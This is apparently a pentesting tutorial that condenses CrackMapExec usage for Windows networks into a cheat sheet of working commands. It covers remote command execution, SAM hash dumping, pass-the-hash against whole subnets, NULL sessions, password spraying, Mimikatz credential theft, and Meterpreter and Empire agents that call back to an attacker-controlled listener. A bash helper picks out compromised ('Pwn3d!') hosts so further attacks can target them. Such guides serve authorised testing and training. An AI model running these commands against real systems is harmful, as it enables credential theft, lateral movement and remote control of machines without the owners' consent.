Gather Your Tools
First off, be a smart hacker and know how to find great online materials, like this how-to:
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
And this excellent tute on CrackMapExec:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
For the TL;DR of that page, start in Bash (CME 4 and later require the protocol, usually smb, as the first argument, so current releases are invoked as crackmapexec smb <target>):
# get syntax and details
python crackmapexec.py
# network enumeration
python crackmapexec.py 192.168.1.0/24
Executing Commands
Executing commands needs local administrator rights on the target. CME marks the hosts where the supplied credentials have those rights with (Pwn3d!) in its output; on hosts without that tag the login may still be valid, but -x, -X and most modules will fail.
CME has three execution methods:
wmiexec executes commands via WMI (the default)
atexec executes commands by scheduling a task with the Windows Task Scheduler
smbexec executes commands by creating and running a service, which also leaves a service-installation event on the host
By default CME falls back to the next method if one fails. Force a single method with the --exec-method flag, e.g. --exec-method smbexec.
Executing commands
Execute whoami on the target (through cmd.exe) using the -x flag:
crackmapexec smb 192.168.1.11 -u Administrator -p 'password' -x whoami
Directly execute PowerShell commands with the -X flag (single quotes keep $PSVersionTable from being expanded by your local shell):
crackmapexec smb 192.168.1.11 -u Administrator -p 'password' -X '$PSVersionTable'
Check for logged-on users
crackmapexec smb 192.168.1.11 -u 'Administrator' -p 'password' --lusers
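When you run CME against a whole range, the (Pwn3d!) tag is the signal that matters, and it pays to pull those hosts out of the output automatically instead of eyeballing it. The bash functions below are an added example, not code from this page or from the CrackMapExec project. The output they parse is a constructed sample in the style of CME's SMB output (the addresses, hostnames, domain and credentials are invented), and the column positions the awk filters rely on are taken from that sample.

```bash
#!/usr/bin/env bash
# Added example: pull hosts out of CME SMB output by result tag.
# SAMPLE_CME_OUTPUT is a constructed sample in the style of CME's output
# (invented hosts, domain and credentials), not a real capture.
SAMPLE_CME_OUTPUT='SMB         192.168.1.11    445    DC01             [*] Windows Server 2016 Standard 14393 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.11    445    DC01             [+] corp.local\Administrator:password (Pwn3d!)
SMB         192.168.1.12    445    WS01             [*] Windows 10 Pro 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.12    445    WS01             [+] corp.local\Administrator:password
SMB         192.168.1.13    445    WS02             [*] Windows 10 Pro 19041 x64 (name:WS02) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.13    445    WS02             [-] corp.local\Administrator:password STATUS_LOGON_FAILURE
SMB         192.168.1.14    445    WS03             [+] corp.local\svc_backup:Summer2023 (Pwn3d!)'

# Columns assumed from the sample: $1 protocol, $2 address, $3 port, $4 hostname, $5 result tag.

# Hosts where the credentials were accepted ([+]), admin or not.
valid_hosts() { awk '$5 == "[+]" { print $2 }'; }

# Hosts where CME confirmed admin rights: the [+] line carries (Pwn3d!).
# These are the only ones -x / -X / --sam / -M will actually work against.
pwned_hosts() { awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2 }'; }

# Hosts whose banner line says SMB signing is not required (useful later for relaying).
unsigned_hosts() { awk '$5 == "[*]" && /\(signing:False\)/ { print $2 }'; }

# Feed a saved run into these (e.g. cme smb 192.168.1.0/24 -u ... -p ... | tee cme.log),
# or the sample here. The output is one address per line, so it can be saved and
# handed back to CME as a target file.
printf '%s\n' "$SAMPLE_CME_OUTPUT" | pwned_hosts
```

Redirect the output of pwned_hosts to a file and pass that file as the target argument for the next CME run, so commands and modules are only sent to hosts where they can succeed.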
Credential Attacks
Dumping the local SAM hashes (needs local admin; --local-auth authenticates against the host's local accounts instead of the domain)
crackmapexec smb 192.168.1.11 -u 'Administrator' -p 'password' --local-auth --sam
Authenticating via SMB with Pass-the-Hash uses the -H flag. The NT hash alone is enough; if you pass the LM:NT pair and the LM half is unknown, use the empty-LM value aad3b435b51404eeaad3b435b51404ee:
crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH
Pass-the-Hash against a subnet
Log in to every host on the subnet over SMB with the admin account and its hash. Add --local-auth when administrator is a local account rather than a domain account; CME authenticates against the domain by default. (Real LM and NT hashes are 32 hex characters each; the value below is illustrative only.)
cme smb 192.168.1.0/24 -u administrator -H 'aabbb435cc1404eeaa35b51404ee:dd09de4ff0aeee8d9f4a61100e51' --local-auth
NULL Sessions
CME, and even the built-in net command, can log in anonymously: a NULL session. Modern Windows restricts what an anonymous session may enumerate, so expect this to pay off mainly on older or misconfigured hosts.
crackmapexec smb <target(s)> -u '' -p ''
# or
net use \\192.168.1.11\ipc$ "" /user:""
(See this short article for more uses of NULL Sessions:
http://smallvoid.com/article/winnt-null-session.html.)
Brute Forcing & Password Spraying
Point crackmapexec at the subnet and pass the creds.
Using SMB
crackmapexec smb 192.168.1.0/24 -u Administrator -p password
However, check the account lockout policy first, so you know how slow you have to go:
crackmapexec smb 192.168.1.0/24 -u Administrator -p password --pass-pol
Look at the Account Lockout Threshold and the Reset Account Lockout Counter (the observation window). A threshold of None means no lockout, so crack away; otherwise stay below the threshold per account within each window, and leave a margin for the users' own failed logins.
Specify a single value, a file or several values for -u, -p or -H and CME will try every combination against all targets over the chosen protocol:
crackmapexec smb 192.168.1.1-100 -u username1 -p password1 password2
crackmapexec wmi 192.168.1.1 -u username1 username2 -p password1
crackmapexec at 192.168.1.0/24 -u ~/usernames -p ~/passwords
crackmapexec smb 192.168.1.1-25,30-35 -u ~/usernames -H ~/ntlm_hashes
In current CME releases the protocol argument is smb (or mssql, winrm, ldap, ssh); wmi and at are execution methods, not protocols, so the two middle commands become crackmapexec smb ... with --exec-method wmiexec or --exec-method atexec. Add --continue-on-success to keep testing every user after the first valid login (by default CME stops on a host once one credential works), and --no-bruteforce to pair the lines of the user and password files one to one instead of trying every combination.
Modules
Using a module
Run cme <protocol> <target(s)> -M <module name>.
Run the SMB Mimikatz module
(Warning: this is known to crash LSASS on some targets, which forces the host to reboot!)
cme smb <target(s)> -u Administrator -p 'password' -M mimikatz
View module options
cme <protocol> -M <module name> --options # to view module options
# for example:
cme smb -M mimikatz --options
Using Module Options
Module options are specified with the -o flag. All options are specified as KEY=value.
Example:
cme <protocol> <target(s)> -u Administrator -p 'password' -M mimikatz -o COMMAND='privilege::debug'
Modules – MimiKatz
cme smb 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M mimikatz
(This is a dangerous module: if LSASS crashes the host reboots, and nobody can log in until it comes back.)
Modules – Enum_Chrome
sudo cme smb 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M enum_chrome
Getting Shells with CrackMapExec
Metasploit
Metasploit Module – met_inject
Show met_inject options:
cme smb -M met_inject --options
SMB to Meterpreter shell. Start a matching Metasploit multi/handler on LHOST:LPORT first; sudo is needed because the module hosts its stager on CME's built-in web server, which binds a privileged port by default:
sudo cme smb 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M met_inject -o LHOST=192.168.1.10 LPORT=5656
Empire
Start the Empire RESTful API (CME talks to Empire through it):
empire --rest --user empireadmin --pass password
With a listener named MyCME already created in Empire, deploy an agent to the target that calls back to that listener:
cme smb 192.168.1.11 -u Administrator -p password --local-auth -M empire_exec -o LISTENER=MyCME
Double-Teaming with Empire and DeathStar
Okay, so CrackMapExec can deploy Empire agents to compromised machines, which is where DeathStar's automation comes in. Use the empire_exec module and specify the listener the Empire agents should call back to, and the agents are deployed and activated on every target at once. Any credentials CME finds are stored in its own credential database, and -id picks one of those stored credentials by its database ID instead of passing -u/-p:
cme smb ~/targets.txt -id 1 -M empire_exec -o LISTENER=DeathStar
Once again this is a TL;DR from this detailed document:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
Check out his whole repository of great resources!